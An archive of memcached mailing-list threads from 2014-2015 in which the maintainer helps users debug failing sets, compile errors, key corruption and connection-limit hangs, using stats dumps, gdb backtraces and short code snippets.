   https://github.com/memcached/memcached/pull/97

   Opening to a wider audience. I need some folks willing to poke at it 
 and see if their workloads fare better or worse with respect to hit ratios.

   The rest of the work remaining on my end is more testing, and some 
 TODO's
   noted in the PR. The remaining work is relatively small aside from the 
 page
   mover idea. It hasn't been crashing or hanging in my testing so far, but
   that might still happen.

   I can't/won't merge this until I get some evidence that it's useful.
   Hoping someone out there can lend a hand. I don't know what the actual
   impact would be, but for some workloads it could be large. Even for 
 folks
   who have set all items to never expire, it could still potentially 
 improve
   hit ratios by better protecting active items.

   It will work best if you at least have a mix of items with TTL's that 
 expire
   in reasonable amounts of time.

   thanks,
   -Dormando




1.4.22

2015-01-01 Thread dormando
https://code.google.com/p/memcached/wiki/ReleaseNotes1422


Re: sets failing, nothing going over the network

2014-12-01 Thread dormando
You may also consider an upgrade sometime...

If the conn tester doesn't pull up much, I don't know what it'd be beyond
things like spaces/newlines/invalid chars sneaking in, or items being too
large. That sort of thing. Cache::Memcached's error reporting is pretty
terrible.

I have a long list of bugs/pull reqs against it that I haven't been
reviewing/merging, if any of you folks are interested in helping there.

On Mon, 1 Dec 2014, Joe Steffee wrote:

 listen_disabled_num doesn't seem to be a likely culprit...

 stats
 STAT pid 11435
 STAT uptime 4457974
 STAT time 1417457018
 STAT version 1.4.5
 STAT pointer_size 64
 STAT rusage_user 19038.393825
 STAT rusage_system 42581.905202
 STAT curr_connections 264
 STAT total_connections 1572308
 STAT connection_structures 402
 STAT cmd_get 658366591
 STAT cmd_set 649621925
 STAT cmd_flush 0
 STAT get_hits 328785935
 STAT get_misses 329580656
 STAT delete_misses 20884653
 STAT delete_hits 100083
 STAT incr_misses 2779284
 STAT incr_hits 44211787
 STAT decr_misses 0
 STAT decr_hits 0
 STAT cas_misses 0
 STAT cas_hits 0
 STAT cas_badval 0
 STAT auth_cmds 0
 STAT auth_errors 0
 STAT bytes_read 12821501027510
 STAT bytes_written 3338632258667
 STAT limit_maxbytes 4294967296
 STAT accepting_conns 1
 STAT listen_disabled_num 0
 STAT threads 4
 STAT conn_yields 441
 STAT bytes 2786601635
 STAT curr_items 5046673
 STAT total_items 48200778
 STAT evictions 0
 STAT reclaimed 30123302
 END


 The web servers are very lightly loaded and have approximately 20GB free 
 memory all the time.

 The utility showed nothing:

 # time ./mc_conn_tester.pl
 Averages: (conn: 0.00045183) (set: 0.00047043) (get: 0.00031982)

 real    53m25.697s
 user    0m17.721s
 sys     0m11.093s

 Even though we saw 14 failures during this time period. We'll look more to 
 see if this is a problem on our end.

 On Sat, Nov 29, 2014 at 4:46 PM, dormando dorma...@rydia.net wrote:
   Hey,

   http://memcached.org/timeouts - sounds like you've already done some tcp
   dumping, so checking the stats as mentioned in here and running the test
   script a bit should illuminate things a bit.

   On Fri, 21 Nov 2014, kgo...@bepress.com wrote:

A couple months ago, we moved our memcached nodes from a dedicated VM 
 to having one each on our four baremetal web servers (mod_perl).
Since we moved, we've been seeing 10-20 failures per hour across our 
 entire environment, where $c->set returns false.
    
I just spent some time with tcpdump and wireshark watching the 
 memcached traffic over port 11211.  The keys that are failing are 
 *not* in the tcpdump, so I'm thinking Cache::Memcached has lost a 
 connection or got a non-functioning socket somehow?
   
Does anything in this scenario give anybody any ideas of what might 
 be going wrong?
   
Each memcached node has about 250 connections at any given time and 
 is handling up to 350 gets/sets per second.  The load on these
   webservers is
around 1 (eight-core boxes). Their total network traffic is about 
 30 Mb/sec, and memcached traffic is about 3 Mb/sec. There's
   nothing in
memcached's logs.
This is debian 6 (squeeze).
   
$ dpkg -l | grep memcached
ii  libcache-memcached-perl                           1.29-1                        Perl module for using memcached servers
ii  memcached                                         1.4.5-1+deb6u1                A high-performance memory object caching system
   
   
   




 --
 Joe Steffee, Linux Systems Administrator
 bepress




Re: Compile fails on Mavericks (Xcode 5 really)

2014-11-29 Thread dormando
Please use a newer source tarball from http://memcached.org/ - this was
fixed ages ago.

On Sat, 29 Nov 2014, vivek verma wrote:

 Hi,
 Can you please specify how to manually remove -pthread?
 I don't have certain rights on the system, so I can't follow the other 
 solutions.
 Thanks

 On Wednesday, October 23, 2013 8:18:35 PM UTC+5:30, Matt Galvin wrote:
   Hello,
  On both Mac OS X 10.8 and the new 10.9 with Xcode 5, memcached fails to 
  compile. Is this a known issue already? Is there a fix in the works 
  already?

 ./configure --enable-64bit --with-libevent=/usr/local
 ---

 gcc -v

 Configured with: --prefix=/Applications/Xcode.app/Contents/Developer/usr
 --with-gxx-include-dir=/Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX10.9.sdk/usr/include/c++/4.2.1

 Apple LLVM version 5.0 (clang-500.2.79) (based on LLVM 3.3svn)

 Target: x86_64-apple-darwin13.0.0

 Thread model: posix

 ---

 gcc -DHAVE_CONFIG_H -I. -DNDEBUG -I/usr/local/include -m64 -g -O2 -pthread -pthread -Wall -Werror -pedantic -Wmissing-prototypes -Wmissing-declarations -Wredundant-decls -MT memcached-cache.o -MD -MP -MF .deps/memcached-cache.Tpo -c -o memcached-cache.o `test -f 'cache.c' || echo './'`cache.c

 mv -f .deps/memcached-cache.Tpo .deps/memcached-cache.Po

 gcc -m64 -g -O2 -pthread -pthread -Wall -Werror -pedantic -Wmissing-prototypes -Wmissing-declarations -Wredundant-decls -L/usr/local/lib -Wl,-rpath,/usr/local/lib -o memcached memcached-memcached.o memcached-hash.o memcached-slabs.o memcached-items.o memcached-assoc.o memcached-thread.o memcached-daemon.o memcached-stats.o memcached-util.o memcached-cache.o -levent

 clang: error: argument unused during compilation: '-pthread'

 clang: error: argument unused during compilation: '-pthread'

 make[2]: *** [memcached] Error 1

 make[1]: *** [all-recursive] Error 1

 make: *** [all] Error 2
 ---

 If I manually remove the -pthread(s) it compiles fine but I'm not sure if 
 that is the correct fix as I've not done any development on
 memcached as of yet.

 Thoughts?

 Thanks,

 Matt





Re: sets failing, nothing going over the network

2014-11-29 Thread dormando
Hey,

http://memcached.org/timeouts - sounds like you've already done some tcp
dumping, so checking the stats as mentioned in here and running the test
script a bit should illuminate things a bit.
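
For a quick look at the connection-related counters while you're at it
(an untested one-liner; adjust host/port):

    echo stats | nc 127.0.0.1 11211 | egrep 'curr_connections|listen_disabled_num|accepting_conns'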

On Fri, 21 Nov 2014, kgo...@bepress.com wrote:

 A couple months ago, we moved our memcached nodes from a dedicated VM to 
 having one each on our four baremetal web servers (mod_perl).
 Since we moved, we've been seeing 10-20 failures per hour across our entire 
 environment, where $c->set returns false.

 I just spent some time with tcpdump and wireshark watching the memcached 
 traffic over port 11211.  The keys that are failing are *not* in the 
 tcpdump, so I'm thinking Cache::Memcached has lost a connection or got a 
 non-functioning socket somehow?

 Does anything in this scenario give anybody any ideas of what might be going 
 wrong?

 Each memcached node has about 250 connections at any given time and is 
 handling up to 350 gets/sets per second.  The load on these webservers is
 around 1 (eight-core boxes). Their total network traffic is about 30 
 Mb/sec, and memcached traffic is about 3 Mb/sec. There's nothing in
 memcached's logs.
 This is debian 6 (squeeze).

 $ dpkg -l | grep memcached
 ii  libcache-memcached-perl                           1.29-1                        Perl module for using memcached servers
 ii  memcached                                         1.4.5-1+deb6u1                A high-performance memory object caching system




Re: memcached 1.4.13: ->remove() sometimes doesn't work

2014-11-29 Thread dormando
Are your sets or any other functions failing sometimes? Are you just more
likely to notice with a delete?

The only issues have always been with the client. Old clients would send
invalid args to the delete command (though it doesn't seem like you're
doing that here). You might just be failing to connect sometimes, double
check http://memcached.org/timeouts for ideas or things to try.

On Wed, 26 Nov 2014, Alexander Kant wrote:

 Hello.

 Currently I'm using memcached 1.4.13.
 Sometimes the ->remove() method doesn't work. It looks like the value 
 stays there.
 I can't say exactly when it doesn't work, but several hundred times it 
 works as expected: the value is cached and can be removed without 
 problems - so the code looks really good at that place. But after several 
 hundred successful times, it doesn't remove the value.
 The question is: is/was this a known problem? Does anybody have some ideas?

 I'm using the Zend Framework.

 Here is the important part of PHP code:

 
 public static function getCache() {
     if (!self::$cache) {
         $options = array(
             'servers' => array(
                 array(
                     'host' => Config::get('cache.memcached.host'),
                     'port' => Config::get('cache.memcached.port'),
                     'persistent' => true,
                     'weight' => 1,
                     'timeout' => 5,
                     'retry_interval' => 15,
                     'status' => true,
                     'default_lifetime' => 3600
                 ),
             ),
         );
         self::$cache = Zend_Cache::factory('Core', 'Memcached',
             array('caching' => true, 'automatic_serialization' => true, 'lifetime' => null),
             $options);
     }

     return self::$cache;
 }
 

 
 public function getCountCached($user_id) {
     $cache = System::getCache();
     $cache_id = 'count_values__' . $user_id;

     if ($cache->test($cache_id)) {
         $data = $cache->load($cache_id);
     } else {
         $data = $this->countValues($user_id);
         $cache->save($data, $cache_id, array(), Time::hours(2));
     }

     return (int)$data;
 }
 

 
 public function invalidateCountCache($user_id) {
     $success = false;

     for ($i = 0; $i < 5; $i++) {
         if (!$success) {
             $success = System::getCache()->remove('count_values__' . $user_id);
         } else {
             return;
         }
     }
 }
 

 As I read somewhere before: the ->remove() method also often returns FALSE, 
 even in cases where the removal was successful.

 I hope somebody has some ideas.

 With best regards,
 Alex




Re: Diagnosing Corruption

2014-11-19 Thread dormando
You're probably getting spaces or newlines into your keys, which can cause
the client protocol to desync with the server. Then you'll get all sorts
of junk into random keys (or random responses from keys which're fine).

Either filtering those or using the binary protocol should fix that for
you.
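
If you go the filtering route, the check is tiny; a minimal sketch in C
(clients in other languages would do the equivalent; 250 bytes is the
ASCII protocol's maximum key length):

    /* reject keys that would desync the ASCII protocol */
    #include <ctype.h>
    #include <stdbool.h>
    #include <string.h>

    bool key_is_safe(const char *key) {
        size_t len = strlen(key);
        if (len == 0 || len > 250)
            return false;
        for (size_t i = 0; i < len; i++) {
            unsigned char c = (unsigned char)key[i];
            /* spaces/newlines terminate the command line early */
            if (isspace(c) || iscntrl(c))
                return false;
        }
        return true;
    }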

On Wed, 19 Nov 2014, labnext...@gmail.com wrote:

 Hi Boris,
 I think I may have misled you.  It is not one or two keys that get 
 corrupted; it seems that most (if not all) keys fetched return incorrect 
 data.  For example, during one of these failures (just this morning), a 
 session key (prefixed with session_) returned an array related to a 
 customer record (prefixed with lab_), a key related to a customer returned 
 a string related to a translation, and a key related to a translation 
 returned

 All heck breaks loose (seemingly) across all keys.  A flush brings things 
 back into the fold.

 Make sense?

 Thanks,

 Mike


 On Wednesday, November 19, 2014 2:22:50 PM UTC-4, Boris wrote:
   I can think of many ways to screw up an application in the way that you 
 describe. Simple programmer error can lead to this sort of behavior. I'd 
 just log every time you do a set for that key, with the value type you are 
 setting.

   On Wed, Nov 19, 2014 at 1:00 PM, labne...@gmail.com wrote:
 Thanks Boris,
 I haven't really given that much thought.  Out of curiosity, why do you 
 think the issue might be on the client end?  I ask because I really don't 
 have a sense of what to look for on that end, and wonder if you might have 
 some suggestions.

 Best,

 Mike


 On Wednesday, November 19, 2014 12:46:16 PM UTC-4, Boris wrote:
   Hi Mike, this sounds to me more like a client/coding error rather than a 
 memcached server problem. That's where I would focus first.
 Boris

 On Wed, Nov 19, 2014 at 11:41 AM, labne...@gmail.com wrote:
   I just had another failure.  After pulling down my apache web servers, 
 and before restarting memcached I grabbed
   stats to see if they showed anything of interest:
  - All 3 servers were reporting for duty following a getServerStatus (PHP 
 client call)
  - curr_connections were listed as 8 across all the instances (apache was 
 down but cron jobs up, so that would have dropped
 things down considerably)
  - listen_disabled_num was listed as 0 across all the instances
  - accepting_conns was listed as 1 across all the instances
  - evictions listed as 0
  - All items across all instances had an evicted and evicted_nonzero and 
 evicted_time value of 0
  - All slabs across all instances had a total_pages value of 1
  - tailrepairs and outofmemory is listed with a value of 0 across all items 
 in each instance
  - global hit rate is 0.9937
  - get_hits is always* greater than cmd_set on a per slab basis.  *One slab 
 reported both values as equal


 As far as I can tell, memcache is reporting that the world is fine and dandy. 
  Should I be enlarging the scope of the search to
 look at OS related factors that could result in the client receiving bad 
 data?  None of the machines are dipping into swap.

 Thanks,

 Mike



 On Wednesday, November 19, 2014 9:35:19 AM UTC-4, labne...@gmail.com wrote:
   For what it is worth, I'm hesitant to upgrade memcached to the latest 
 version as a step to try and solve this
   issue.  It seems to me that since our installs have been running 
 without issue for quite some time (close to a
   year), that there are other variables at play here.  I just don't 
 understand the variables.  ;)
 Thanks,

 Mike


 On Tuesday, November 18, 2014 2:00:46 PM UTC-4, labne...@gmail.com wrote:
   Hi There,
 I'm trying to diagnose a new problem with Memcache that seems to be happening 
 with greater frequency.  The
 issue has to do with memcache get requests returning incorrect responses 
 (data from other keys returned). 
 Restarting or flushing the servers seems to resolve the issue. 

 Do any memcache veterans have any suggestions of how I might dig into this 
 issue?  Stats that I might want to
 trace, log files to look at, etc?  Does maybe this symptom fit the 
 description of any known issues?

 I'm keeping a casual eye on curr_connections, listen_disabled_num, 
 accepting_conns, bytes, and
 limit_maxbytes (all show nothing unusual).  I've verified that all servers 
 and clients are set up in a
 consistent fashion.  I'm not sure where to go from here to better understand 
 the problem.


 If it helps, I'm running 1.4.13 (ubuntu 12.04 LTS) across 3 servers, 
 connecting in with PHP Memcache 3.0.6


 Tips?

 Mike



  




Re: memcached-1.4.20 stuck when Too many open connections

2014-11-05 Thread dormando
There're too many things that will go wrong if malloc fails...

There's a stats counter covering some of them. Is that going up for you?

Have you disabled overcommit memory? Have you observed the process size
when it hangs? malloc should almost never actually fail under normal
conditions...

On Wed, 5 Nov 2014, Samdy Sun wrote:

 Hey,  
   I also got a stuck instance when specifying -m 200. 
   As mentioned previously, could that case happen as below?
   1. malloc fails in conn_new()  2. event_add fails in conn_new()
   3. some other case?

   And I found another case after reviewing the code. Here it is: memcached is stuck 
 for a while, so our client closes the connection because of a
 200ms timeout. So, if the previous 1023 connections time out and memcached 
 calls transmit to write, a Broken pipe error will happen. And
 then, memcached gets a TRANSMIT_HARD_ERROR and calls conn_close 
 immediately.
   So, it will happen as below?
   accept(), errno == EMFILE
   fd1 close,
   fd2 close,
   fd3 close,
   ……
   fd1023 close,
   accept_new_conns(false) for EMFILE

   That is just a supposition, but I will try to log some information to prove 
 it.
   
   Anyway, is it better to call conn_close after a while, such as 
 waiting for the next event, when getting a TRANSMIT_HARD_ERROR, rather than
 calling conn_close immediately?
   

 On Friday, October 31, 2014 at 3:01:06 PM UTC+8, Dormando wrote:
   Hey,

   How are you reproducing this? How many connections do you typically have
   open?

   It's really bizarre that your curr_conns is 5, but your connections 
 are
   disabled? Even if there's still a race, as more connections close they
   each have an opportunity to flip the acceptor back on.

   Can you print what stats settings shows? If it's adjusting your actual
   maxconns downward it should show there...

   On Wed, 29 Oct 2014, Samdy Sun wrote:

There are no deadlocks, (gdb) info thread
* 5 Thread 0xf7771b70 (LWP 24962)  0x080509dd in transmit (fd=431, 
 which=2, arg=0xfef8ce48)
    at memcached.c:4044
  4 Thread 0xf6d70b70 (LWP 24963)  0x007ad430 in __kernel_vsyscall ()
  3 Thread 0xf636fb70 (LWP 24964)  0x007ad430 in __kernel_vsyscall ()
  2 Thread 0xf596eb70 (LWP 24965)  0x007ad430 in __kernel_vsyscall ()
  1 Thread 0xf77b38d0 (LWP 24961)  0x007ad430 in __kernel_vsyscall ()
(gdb) t 1
[Switching to thread 1 (Thread 0xf77b38d0 (LWP 24961))]#0  0x007ad430 
 in __kernel_vsyscall ()
(gdb) bt
#0  0x007ad430 in __kernel_vsyscall ()
#1  0x005c5366 in epoll_wait () from /lib/libc.so.6
#2  0x0074a750 in epoll_dispatch (base=0x9305008, arg=0x93053c0, 
 tv=0xff8e0cdc) at epoll.c:198
#3  0x0073d714 in event_base_loop (base=0x9305008, flags=0) at 
 event.c:538
#4  0x08054467 in main (argc=19, argv=0xff8e2274) at memcached.c:5795
(gdb) 
   
(gdb) t 2
[Switching to thread 2 (Thread 0xf596eb70 (LWP 24965))]#0  0x007ad430 
 in __kernel_vsyscall ()
(gdb) bt
#0  0x007ad430 in __kernel_vsyscall ()
#1  0x00a652bc in pthread_cond_wait@@GLIBC_2.3.2 () from 
 /lib/libpthread.so.0
#2  0x08055662 in slab_rebalance_thread (arg=0x0) at slabs.c:859
#3  0x00a61a49 in start_thread () from /lib/libpthread.so.0
#4  0x005c4aee in clone () from /lib/libc.so.6
(gdb) t 3
[Switching to thread 3 (Thread 0xf636fb70 (LWP 24964))]#0  0x007ad430 
 in __kernel_vsyscall ()
(gdb) bt
#0  0x007ad430 in __kernel_vsyscall ()
#1  0x005838b6 in nanosleep () from /lib/libc.so.6
#2  0x005836e0 in sleep () from /lib/libc.so.6
#3  0x08056f6e in slab_maintenance_thread (arg=0x0) at slabs.c:819
#4  0x00a61a49 in start_thread () from /lib/libpthread.so.0
#5  0x005c4aee in clone () from /lib/libc.so.6
(gdb) t 4
[Switching to thread 4 (Thread 0xf6d70b70 (LWP 24963))]#0  0x007ad430 
 in __kernel_vsyscall ()
(gdb) bt
#0  0x007ad430 in __kernel_vsyscall ()
#1  0x00a652bc in pthread_cond_wait@@GLIBC_2.3.2 () from 
 /lib/libpthread.so.0
#2  0x080599f5 in assoc_maintenance_thread (arg=0x0) at assoc.c:251
#3  0x00a61a49 in start_thread () from /lib/libpthread.so.0
#4  0x005c4aee in clone () from /lib/libc.so.6
(gdb) t 5
[Switching to thread 5 (Thread 0xf7771b70 (LWP 24962))]#0  0x007ad430 
 in __kernel_vsyscall ()
(gdb) bt
#0  0x007ad430 in __kernel_vsyscall ()
#1  0x00a68998 in sendmsg () from /lib/libpthread.so.0
#2  0x080509dd in transmit (fd=431, which=2, arg=0xfef8ce48) at 
 memcached.c:4044
#3  drive_machine (fd=431, which=2, arg=0xfef8ce48) at 
 memcached.c:4370
#4  event_handler (fd=431, which=2, arg=0xfef8ce48) at 
 memcached.c:4441
#5  0x0073d9e4 in event_process_active (base=0x9310658, flags=0) at 
 event.c:395
#6  event_base_loop (base=0x9310658, flags=0

Re: memcached-1.4.20 stuck when Too many open connections

2014-10-31 Thread dormando
Hey,

How are you reproducing this? How many connections do you typically have
open?

It's really bizarre that your curr_conns is 5, but your connections are
disabled? Even if there's still a race, as more connections close they
each have an opportunity to flip the acceptor back on.

Can you print what stats settings shows? If it's adjusting your actual
maxconns downward it should show there...

On Wed, 29 Oct 2014, Samdy Sun wrote:

 There are no deadlocks, (gdb) info thread
 * 5 Thread 0xf7771b70 (LWP 24962)  0x080509dd in transmit (fd=431, which=2, 
 arg=0xfef8ce48)
     at memcached.c:4044
   4 Thread 0xf6d70b70 (LWP 24963)  0x007ad430 in __kernel_vsyscall ()
   3 Thread 0xf636fb70 (LWP 24964)  0x007ad430 in __kernel_vsyscall ()
   2 Thread 0xf596eb70 (LWP 24965)  0x007ad430 in __kernel_vsyscall ()
   1 Thread 0xf77b38d0 (LWP 24961)  0x007ad430 in __kernel_vsyscall ()
 (gdb) t 1
 [Switching to thread 1 (Thread 0xf77b38d0 (LWP 24961))]#0  0x007ad430 in 
 __kernel_vsyscall ()
 (gdb) bt
 #0  0x007ad430 in __kernel_vsyscall ()
 #1  0x005c5366 in epoll_wait () from /lib/libc.so.6
 #2  0x0074a750 in epoll_dispatch (base=0x9305008, arg=0x93053c0, 
 tv=0xff8e0cdc) at epoll.c:198
 #3  0x0073d714 in event_base_loop (base=0x9305008, flags=0) at event.c:538
 #4  0x08054467 in main (argc=19, argv=0xff8e2274) at memcached.c:5795
 (gdb) 

 (gdb) t 2
 [Switching to thread 2 (Thread 0xf596eb70 (LWP 24965))]#0  0x007ad430 in 
 __kernel_vsyscall ()
 (gdb) bt
 #0  0x007ad430 in __kernel_vsyscall ()
 #1  0x00a652bc in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0
 #2  0x08055662 in slab_rebalance_thread (arg=0x0) at slabs.c:859
 #3  0x00a61a49 in start_thread () from /lib/libpthread.so.0
 #4  0x005c4aee in clone () from /lib/libc.so.6
 (gdb) t 3
 [Switching to thread 3 (Thread 0xf636fb70 (LWP 24964))]#0  0x007ad430 in 
 __kernel_vsyscall ()
 (gdb) bt
 #0  0x007ad430 in __kernel_vsyscall ()
 #1  0x005838b6 in nanosleep () from /lib/libc.so.6
 #2  0x005836e0 in sleep () from /lib/libc.so.6
 #3  0x08056f6e in slab_maintenance_thread (arg=0x0) at slabs.c:819
 #4  0x00a61a49 in start_thread () from /lib/libpthread.so.0
 #5  0x005c4aee in clone () from /lib/libc.so.6
 (gdb) t 4
 [Switching to thread 4 (Thread 0xf6d70b70 (LWP 24963))]#0  0x007ad430 in 
 __kernel_vsyscall ()
 (gdb) bt
 #0  0x007ad430 in __kernel_vsyscall ()
 #1  0x00a652bc in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0
 #2  0x080599f5 in assoc_maintenance_thread (arg=0x0) at assoc.c:251
 #3  0x00a61a49 in start_thread () from /lib/libpthread.so.0
 #4  0x005c4aee in clone () from /lib/libc.so.6
 (gdb) t 5
 [Switching to thread 5 (Thread 0xf7771b70 (LWP 24962))]#0  0x007ad430 in 
 __kernel_vsyscall ()
 (gdb) bt
 #0  0x007ad430 in __kernel_vsyscall ()
 #1  0x00a68998 in sendmsg () from /lib/libpthread.so.0
 #2  0x080509dd in transmit (fd=431, which=2, arg=0xfef8ce48) at 
 memcached.c:4044
 #3  drive_machine (fd=431, which=2, arg=0xfef8ce48) at memcached.c:4370
 #4  event_handler (fd=431, which=2, arg=0xfef8ce48) at memcached.c:4441
 #5  0x0073d9e4 in event_process_active (base=0x9310658, flags=0) at 
 event.c:395
 #6  event_base_loop (base=0x9310658, flags=0) at event.c:547
 #7  0x08059fee in worker_libevent (arg=0x930c698) at thread.c:471
 #8  0x00a61a49 in start_thread () from /lib/libpthread.so.0
 #9  0x005c4aee in clone () from /lib/libc.so.6
 (gdb) 

  From strace, it looks like the only event left on epoll is the maxconnsevent?
 epoll_wait(4, {}, 32, 10)               = 0
 clock_gettime(CLOCK_MONOTONIC, {8374269, 10084037}) = 0
 epoll_wait(4, {}, 32, 10)               = 0
 clock_gettime(CLOCK_MONOTONIC, {8374269, 20246365}) = 0
 epoll_wait(4, {}, 32, 10)               = 0
 clock_gettime(CLOCK_MONOTONIC, {8374269, 30382098}) = 0
 epoll_wait(4, {}, 32, 10)               = 0
 clock_gettime(CLOCK_MONOTONIC, {8374269, 40509766}) = 0
 epoll_wait(4, {}, 32, 10)               = 0
 clock_gettime(CLOCK_MONOTONIC, {8374269, 50657403}) = 0
 epoll_wait(4, {}, 32, 10)               = 0
 clock_gettime(CLOCK_MONOTONIC, {8374269, 60823841}) = 0
 epoll_wait(4, {}, 32, 10)               = 0
 clock_gettime(CLOCK_MONOTONIC, {8374269, 71013006}) = 0
 epoll_wait(4, {}, 32, 10)               = 0
 clock_gettime(CLOCK_MONOTONIC, {8374269, 81234264}) = 0
 epoll_wait(4, {}, 32, 10)               = 0
 clock_gettime(CLOCK_MONOTONIC, {8374269, 91407508}) = 0
 epoll_wait(4, {}, 32, 10)               = 0
 clock_gettime(CLOCK_MONOTONIC, {8374269, 101581187}) = 0
 epoll_wait(4, {}, 32, 10)               = 0
 clock_gettime(CLOCK_MONOTONIC, {8374269, 111752457}) = 0
 epoll_wait(4, {}, 32, 10)               = 0
 clock_gettime(CLOCK_MONOTONIC, {8374269, 121919049}) = 0
 epoll_wait(4, {}, 32, 10)               = 0
 clock_gettime(CLOCK_MONOTONIC, {8374269, 132057597}) = 0



 On Wednesday, October 29, 2014 at 2:47:23 PM UTC+8, Samdy Sun wrote:
   Hello, I got a memcached-1.4.20 stuck problem when EMFILE happens.
   Here is my memcached cmdline: memcached -s /xxx/mc_usock.11201 -c 1024 
 -m 4000 -f 

Re: memcached-1.4.20 stuck when Too many open connections

2014-10-31 Thread dormando
Hey,

32-bit memcached with -m 4000 will never work. the best you can do is
probably -m 1600. 32bit applications typically can only allocate up to 2G
of ram.

memcached isn't protected from a lot of malloc failure scenarios, so what
you're doing will never work.

-m 4000 only limits the slab memory usage. there're a lot of buffers/etc
outside of that. Also the hash table, which is measured separately.

On Fri, 31 Oct 2014, Samdy Sun wrote:

 @Dormando,  
   I tried my best to reproduce this in my environment, but failed. This just 
 happened on my servers. 

   I use the stats command to check whether memcached is available or not. If 
 memcached is unavailable, we will not send requests to it. 

   What I find strange is that my curr_conns is 5 and memcached can't 
 recover by itself. I think the conn_new call may fail, and it calls
 close(fd) directly, not conn_close()? Such as below?

   1. malloc fails in conn_new()
   2. event_add fails in conn_new()
   3. some other case?

   Note that I build memcached on a 32-bit system and run it on a 
 64-bit system. Additionally, I start memcached with -m 4000.

   Thanks,
   Samdy Sun

 On Friday, October 31, 2014 at 3:01:06 PM UTC+8, Dormando wrote:
   Hey,

   How are you reproducing this? How many connections do you typically have
   open?

   It's really bizarre that your curr_conns is 5, but your connections 
 are
   disabled? Even if there's still a race, as more connections close they
   each have an opportunity to flip the acceptor back on.

   Can you print what stats settings shows? If it's adjusting your actual
   maxconns downward it should show there...

   On Wed, 29 Oct 2014, Samdy Sun wrote:

There are no deadlocks, (gdb) info thread
* 5 Thread 0xf7771b70 (LWP 24962)  0x080509dd in transmit (fd=431, 
 which=2, arg=0xfef8ce48)
    at memcached.c:4044
  4 Thread 0xf6d70b70 (LWP 24963)  0x007ad430 in __kernel_vsyscall ()
  3 Thread 0xf636fb70 (LWP 24964)  0x007ad430 in __kernel_vsyscall ()
  2 Thread 0xf596eb70 (LWP 24965)  0x007ad430 in __kernel_vsyscall ()
  1 Thread 0xf77b38d0 (LWP 24961)  0x007ad430 in __kernel_vsyscall ()
(gdb) t 1
[Switching to thread 1 (Thread 0xf77b38d0 (LWP 24961))]#0  0x007ad430 
 in __kernel_vsyscall ()
(gdb) bt
#0  0x007ad430 in __kernel_vsyscall ()
#1  0x005c5366 in epoll_wait () from /lib/libc.so.6
#2  0x0074a750 in epoll_dispatch (base=0x9305008, arg=0x93053c0, 
 tv=0xff8e0cdc) at epoll.c:198
#3  0x0073d714 in event_base_loop (base=0x9305008, flags=0) at 
 event.c:538
#4  0x08054467 in main (argc=19, argv=0xff8e2274) at memcached.c:5795
(gdb) 
   
(gdb) t 2
[Switching to thread 2 (Thread 0xf596eb70 (LWP 24965))]#0  0x007ad430 
 in __kernel_vsyscall ()
(gdb) bt
#0  0x007ad430 in __kernel_vsyscall ()
#1  0x00a652bc in pthread_cond_wait@@GLIBC_2.3.2 () from 
 /lib/libpthread.so.0
#2  0x08055662 in slab_rebalance_thread (arg=0x0) at slabs.c:859
#3  0x00a61a49 in start_thread () from /lib/libpthread.so.0
#4  0x005c4aee in clone () from /lib/libc.so.6
(gdb) t 3
[Switching to thread 3 (Thread 0xf636fb70 (LWP 24964))]#0  0x007ad430 
 in __kernel_vsyscall ()
(gdb) bt
#0  0x007ad430 in __kernel_vsyscall ()
#1  0x005838b6 in nanosleep () from /lib/libc.so.6
#2  0x005836e0 in sleep () from /lib/libc.so.6
#3  0x08056f6e in slab_maintenance_thread (arg=0x0) at slabs.c:819
#4  0x00a61a49 in start_thread () from /lib/libpthread.so.0
#5  0x005c4aee in clone () from /lib/libc.so.6
(gdb) t 4
[Switching to thread 4 (Thread 0xf6d70b70 (LWP 24963))]#0  0x007ad430 
 in __kernel_vsyscall ()
(gdb) bt
#0  0x007ad430 in __kernel_vsyscall ()
#1  0x00a652bc in pthread_cond_wait@@GLIBC_2.3.2 () from 
 /lib/libpthread.so.0
#2  0x080599f5 in assoc_maintenance_thread (arg=0x0) at assoc.c:251
#3  0x00a61a49 in start_thread () from /lib/libpthread.so.0
#4  0x005c4aee in clone () from /lib/libc.so.6
(gdb) t 5
[Switching to thread 5 (Thread 0xf7771b70 (LWP 24962))]#0  0x007ad430 
 in __kernel_vsyscall ()
(gdb) bt
#0  0x007ad430 in __kernel_vsyscall ()
#1  0x00a68998 in sendmsg () from /lib/libpthread.so.0
#2  0x080509dd in transmit (fd=431, which=2, arg=0xfef8ce48) at 
 memcached.c:4044
#3  drive_machine (fd=431, which=2, arg=0xfef8ce48) at 
 memcached.c:4370
#4  event_handler (fd=431, which=2, arg=0xfef8ce48) at 
 memcached.c:4441
#5  0x0073d9e4 in event_process_active (base=0x9310658, flags=0) at 
 event.c:395
#6  event_base_loop (base=0x9310658, flags=0) at event.c:547
#7  0x08059fee in worker_libevent (arg=0x930c698) at thread.c:471
#8  0x00a61a49 in start_thread () from /lib/libpthread.so.0
#9

Re: memcached-1.4.20 stuck when Too many open connections

2014-10-29 Thread dormando
You're absolutely sure the running version was 1.4.20? that looks like a
bug that was fixed in .19 or .20

hmmm... maybe a unix domain bug?

On Tue, 28 Oct 2014, Samdy Sun wrote:

 Hello, I got a memcached-1.4.20 stuck problem when EMFILE happens.
   Here is my memcached cmdline: memcached -s /xxx/mc_usock.11201 -c 1024 
 -m 4000 -f 1.05 -o slab_automove -o slab_reassign  -t 1 -p 11201.
  
   cat /proc/version 
   Linux version 2.6.32-358.el6.x86_64 
 (mockbu...@x86-022.build.eng.bos.redhat.com) (gcc version 4.4.7 20120313 (Red 
 Hat 4.4.7-3) (GCC) ) #1 SMP Tue
 Jan 29 11:47:41 EST 2013

   memcached-1.4.20 gets stuck and doesn't work any more after it runs for a period of 
 time.

   Here is some information from gdb:  (gdb) p stats
   $2 = {mutex = {__data = {__lock = 0, __count = 0, __owner = 0, __kind = 0, 
 __nusers = 0, {__spins = 0, 
         __list = {__next = 0x0}}}, __size = '\000' <repeats 23 times>, 
 __align = 0}, curr_items = 149156, 
   total_items = 9876811, curr_bytes = 3712501870, curr_conns = 5, total_conns 
 = 39738, rejected_conns = 0, 
   malloc_fails = 0, reserved_fds = 5, conn_structs = 1012, get_cmds = 0, 
 set_cmds = 0, touch_cmds = 0, 
   get_hits = 0, get_misses = 0, touch_hits = 0, touch_misses = 0, evictions = 
 0, reclaimed = 0, 
   started = 0, accepting_conns = false, listen_disabled_num = 1, 
